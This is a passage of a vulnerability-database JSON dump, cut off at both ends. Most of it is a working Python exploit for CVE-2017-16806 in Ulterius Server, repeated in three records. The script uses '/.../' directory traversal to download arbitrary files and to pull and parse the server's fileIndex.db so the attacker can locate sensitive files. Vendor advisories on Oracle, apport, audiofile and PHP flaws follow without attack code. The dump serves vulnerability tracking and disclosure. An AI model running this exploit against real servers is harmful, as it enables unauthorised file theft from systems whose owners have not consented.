slashes from output file name\r\n outFile = fileName.replace('\\\\','_')\r\n \r\n # Remove drive letter and change slashes\r\n if \":\\\\\" in fileName[:3]:\r\n fileName = fileName[3:]\r\n \r\n # Replace slashes\r\n fileName = fileName.replace('\\\\','/') # Replace slashes\r\n \r\n # Build URL\r\n url = str(args.url[0]) + baseDir + fileName\r\n print \"Retrieving \" + url\r\n \r\n # Download file\r\n r = requests.get(url=url, stream=True) # Retrieve file\r\n \r\n # Write file\r\n f = open(outFile, 'w')\r\n f.write(r.content)\r\n \r\n # We are going to download the fileIndex.db file\r\n if args.index:\r\n # Setup the URL\r\n url = args.url[0] + \"/.../fileIndex.db\"\r\n print \"Downloading \" + url\r\n \r\n # Download file\r\n r = requests.get(url=url, stream=True)\r\n \r\n # decompress the data\r\n data = zlib.decompress( r.content, -15 )\r\n \r\n # Open output file for writing\r\n f = open('fileIndex.db', 'w')\r\n \r\n # Strip off header info (not sure what this is)\r\n data = data[8:]\r\n \r\n # Process file names and write to output file\r\n i = 0\r\n while i < len(data): \r\n i, filename = processChunk(i, data) # Get file name\r\n i, directory = processChunk(i, data) # Get file path\r\n i += 8 # Skip the FFFFFFFFFFFFFFFF\r\n f.write(directory + '\\\\' + filename + '\\n') # Write to output file\r\n \r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2018-04-11] #", "sourceHref": "https://0day.today/exploit/28984", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2017-11-14T12:32:37", "description": "Ulterius Server < 1.9.5.0 - Directory Traversal. CVE-2017-16806. Remote exploit for Windows platform", "published": "2017-11-13T00:00:00", "type": "exploitdb", "title": "Ulterius Server < 1.9.5.0 - Directory Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16806"], "modified": "2017-11-13T00:00:00", "id": "EDB-ID:43141", "href": "https://www.exploit-db.com/exploits/43141/", "sourceData": "# Exploit Title: Ulterius Server < 1.9.5.0 Directory Traversal Arbitrary File Access\r\n# Date: 11/13/2017\r\n# Exploit Author: Rick Osgood\r\n# Vendor Homepage: https://ulterius.io/\r\n# Software Link: https://github.com/Ulterius/server/tree/0e4f2113da287aac88a8b4c5f8364a03685d393d\r\n# Version: < 1.9.5.0\r\n# Tested on: Windows Server 2012 R2\r\n# CVE : CVE-2017-16806\r\n#\r\n# You can download almost any file that resides on the same drive letter as Ulterius server.\r\n# Example: http://ulteriusURL:22006/.../.../.../.../.../.../.../.../.../windows/win.ini\r\n#\r\n# Unfortunately, you need to know the path to the file you want to download.\r\n# Fortunately, Ulterius indexes every file on the system, and it's usually stored in the same place:\r\n# http://ulteriusURL:2206/.../fileIndex.db\r\n#\r\n# This script will retrieve the fileIndex.db file for you, decompress it, and process the list to\r\n# make it human readable. Then you can use the same script to download any juicy files you find.\r\n#\r\n# Ulterius writes the following to the fileIndex.db file:\r\n # First four bytes are a timestamp so we can ignore this\r\n# The next four items repeat until the end of the file:\r\n # filename.length (4 bytes?)\r\n # filename\r\n # directory.length (4 bytes?)\r\n # directory\r\n\r\nimport requests\r\nimport sys\r\nimport argparse\r\nimport zlib\r\nimport struct\r\n\r\n# This function grabs the filename or file path from the fileIndex\r\ndef processChunk(i, data):\r\n\tlength = struct.unpack('B', data[i])[0]\r\n\tlength += struct.unpack('B', data[i+1])[0]\r\n\tlength += struct.unpack('B', data[i+2])[0]\r\n\tlength += struct.unpack('B', data[i+3])[0]\r\n\t\r\n\ti += 4\r\n\tfilename = data[i:i+length]\r\n\ti += length\r\n\r\n\treturn i, filename\r\n\r\n# Main function\r\ndef main():\r\n\t# Parse arguments\r\n\tparser = argparse.ArgumentParser(description='Ulterius exploit by Rick osgood')\r\n\tparser.add_argument('url', type=str, nargs='+', help='URL of the Ulterius server including port')\r\n\tparser.add_argument('--retrieve', metavar='FILEPATH', type=str, nargs='+', help='Retrieve file from server (e.g. c:\\windows\\win.ini)')\r\n\tparser.add_argument('--index', help='Retrieve, decompress, and process fileIndex.db (List of all files indexed by Ulterius)', action='store_true')\r\n\targs = parser.parse_args()\r\n\r\n # We are going to retrieve a specified file\r\n\tif args.retrieve:\r\n\t\tfileName = str(args.retrieve[0])\r\n\t\t\r\n # This works for the default Ulterius install directory.\r\n\t\tbaseDir = \"/.../.../.../.../.../.../.../.../.../\"\r\n\t\r\n # Remove slashes from output file name\r\n\t\toutFile = fileName.replace('\\\\','_')\r\n\t\r\n\t\t# Remove drive letter and change slashes\r\n\t\tif \":\\\\\" in fileName[:3]:\r\n\t\t\tfileName = fileName[3:]\r\n\t\r\n # Replace slashes\r\n\t\tfileName = fileName.replace('\\\\','/')\t# Replace slashes\r\n\t \r\n # Build URL\r\n\t\turl = str(args.url[0]) + baseDir + fileName\r\n\t\tprint \"Retrieving \" + url\r\n\t \r\n # Download file\r\n\t\tr = requests.get(url=url, stream=True)\t# Retrieve file\r\n\t\r\n # Write file\r\n\t\tf = open(outFile, 'w')\r\n\t\tf.write(r.content)\r\n\t\r\n # We are going to download the fileIndex.db file\r\n\tif args.index:\r\n # Setup the URL\r\n\t\turl = args.url[0] + \"/.../fileIndex.db\"\r\n\t\tprint \"Downloading \" + url\r\n\r\n # Download file\r\n\t\tr = requests.get(url=url, stream=True)\r\n\t\t\r\n # decompress the data\r\n data = zlib.decompress( r.content, -15 )\r\n\t\t\r\n # Open output file for writing\r\n\t\tf = open('fileIndex.db', 'w')\r\n\t\r\n\t\t# Strip off header info (not sure what this is)\r\n\t\tdata = data[8:]\r\n\t\t\r\n\t\t# Process file names and write to output file\r\n\t\ti = 0\r\n\t\twhile i < len(data):\t\r\n\t\t\ti, filename = processChunk(i, data) # Get file name\r\n\t\t\ti, directory = processChunk(i, data) # Get file path\r\n\t\t\ti += 8 # Skip the FFFFFFFFFFFFFFFF\r\n\t \t\tf.write(directory + '\\\\' + filename + '\\n') # Write to output file\r\n\t\r\nif __name__ == \"__main__\":\r\n main()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43141/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:52", "description": "\nUlterius Server 1.9.5.0 - Directory Traversal", "edition": 1, "published": "2017-11-13T00:00:00", "title": "Ulterius Server 1.9.5.0 - Directory Traversal", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16806"], "modified": "2017-11-13T00:00:00", "id": "EXPLOITPACK:61D5F57618B98619E355D261C4E1149D", "href": "", "sourceData": "# Exploit Title: Ulterius Server < 1.9.5.0 Directory Traversal Arbitrary File Access\n# Date: 11/13/2017\n# Exploit Author: Rick Osgood\n# Vendor Homepage: https://ulterius.io/\n# Software Link: https://github.com/Ulterius/server/tree/0e4f2113da287aac88a8b4c5f8364a03685d393d\n# Version: < 1.9.5.0\n# Tested on: Windows Server 2012 R2\n# CVE : CVE-2017-16806\n#\n# You can download almost any file that resides on the same drive letter as Ulterius server.\n# Example: http://ulteriusURL:22006/.../.../.../.../.../.../.../.../.../windows/win.ini\n#\n# Unfortunately, you need to know the path to the file you want to download.\n# Fortunately, Ulterius indexes every file on the system, and it's usually stored in the same place:\n# http://ulteriusURL:2206/.../fileIndex.db\n#\n# This script will retrieve the fileIndex.db file for you, decompress it, and process the list to\n# make it human readable. Then you can use the same script to download any juicy files you find.\n#\n# Ulterius writes the following to the fileIndex.db file:\n # First four bytes are a timestamp so we can ignore this\n# The next four items repeat until the end of the file:\n # filename.length (4 bytes?)\n # filename\n # directory.length (4 bytes?)\n # directory\n\nimport requests\nimport sys\nimport argparse\nimport zlib\nimport struct\n\n# This function grabs the filename or file path from the fileIndex\ndef processChunk(i, data):\n\tlength = struct.unpack('B', data[i])[0]\n\tlength += struct.unpack('B', data[i+1])[0]\n\tlength += struct.unpack('B', data[i+2])[0]\n\tlength += struct.unpack('B', data[i+3])[0]\n\t\n\ti += 4\n\tfilename = data[i:i+length]\n\ti += length\n\n\treturn i, filename\n\n# Main function\ndef main():\n\t# Parse arguments\n\tparser = argparse.ArgumentParser(description='Ulterius exploit by Rick osgood')\n\tparser.add_argument('url', type=str, nargs='+', help='URL of the Ulterius server including port')\n\tparser.add_argument('--retrieve', metavar='FILEPATH', type=str, nargs='+', help='Retrieve file from server (e.g. c:\\windows\\win.ini)')\n\tparser.add_argument('--index', help='Retrieve, decompress, and process fileIndex.db (List of all files indexed by Ulterius)', action='store_true')\n\targs = parser.parse_args()\n\n # We are going to retrieve a specified file\n\tif args.retrieve:\n\t\tfileName = str(args.retrieve[0])\n\t\t\n # This works for the default Ulterius install directory.\n\t\tbaseDir = \"/.../.../.../.../.../.../.../.../.../\"\n\t\n # Remove slashes from output file name\n\t\toutFile = fileName.replace('\\\\','_')\n\t\n\t\t# Remove drive letter and change slashes\n\t\tif \":\\\\\" in fileName[:3]:\n\t\t\tfileName = fileName[3:]\n\t\n # Replace slashes\n\t\tfileName = fileName.replace('\\\\','/')\t# Replace slashes\n\t \n # Build URL\n\t\turl = str(args.url[0]) + baseDir + fileName\n\t\tprint \"Retrieving \" + url\n\t \n # Download file\n\t\tr = requests.get(url=url, stream=True)\t# Retrieve file\n\t\n # Write file\n\t\tf = open(outFile, 'w')\n\t\tf.write(r.content)\n\t\n # We are going to download the fileIndex.db file\n\tif args.index:\n # Setup the URL\n\t\turl = args.url[0] + \"/.../fileIndex.db\"\n\t\tprint \"Downloading \" + url\n\n # Download file\n\t\tr = requests.get(url=url, stream=True)\n\t\t\n # decompress the data\n data = zlib.decompress( r.content, -15 )\n\t\t\n # Open output file for writing\n\t\tf = open('fileIndex.db', 'w')\n\t\n\t\t# Strip off header info (not sure what this is)\n\t\tdata = data[8:]\n\t\t\n\t\t# Process file names and write to output file\n\t\ti = 0\n\t\twhile i < len(data):\t\n\t\t\ti, filename = processChunk(i, data) # Get file name\n\t\t\ti, directory = processChunk(i, data) # Get file path\n\t\t\ti += 8 # Skip the FFFFFFFFFFFFFFFF\n\t \t\tf.write(directory + '\\\\' + filename + '\\n') # Write to output file\n\t\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4845"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - Database user enumeration\r\nAdvisory ID: [ERPSCAN-15-025]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nDate published:20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: User Enumeration\r\nImpact: user enumeration, SSRF\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4845\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity None (N)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThere is a script in EBS that is used to connect to the database and\r\ndisplays the connection status. Different connection results can help\r\nan attacker to find existing database accounts.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.2.4\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nDatabase users enumeration\r\nVunerable script: Aoljtest.js\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32656", "title": "[ERPSCAN-15-025] Oracle E-Business Suite Database user enumeration Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1338"], "description": "Symbolic links and hadlinks vulnerability in log files, privilege escalation.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14720", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "title": "apport security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4886"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-028]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4886\r\nCVSS Information\r\nCVSS Base Score: 6.4 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Low (L)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/copxml\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32653", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32653", "title": "[ERPSCAN-15-028] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "Crash on audiofiles processing.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14754", "title": "audiofile memory corruption", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. (CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": 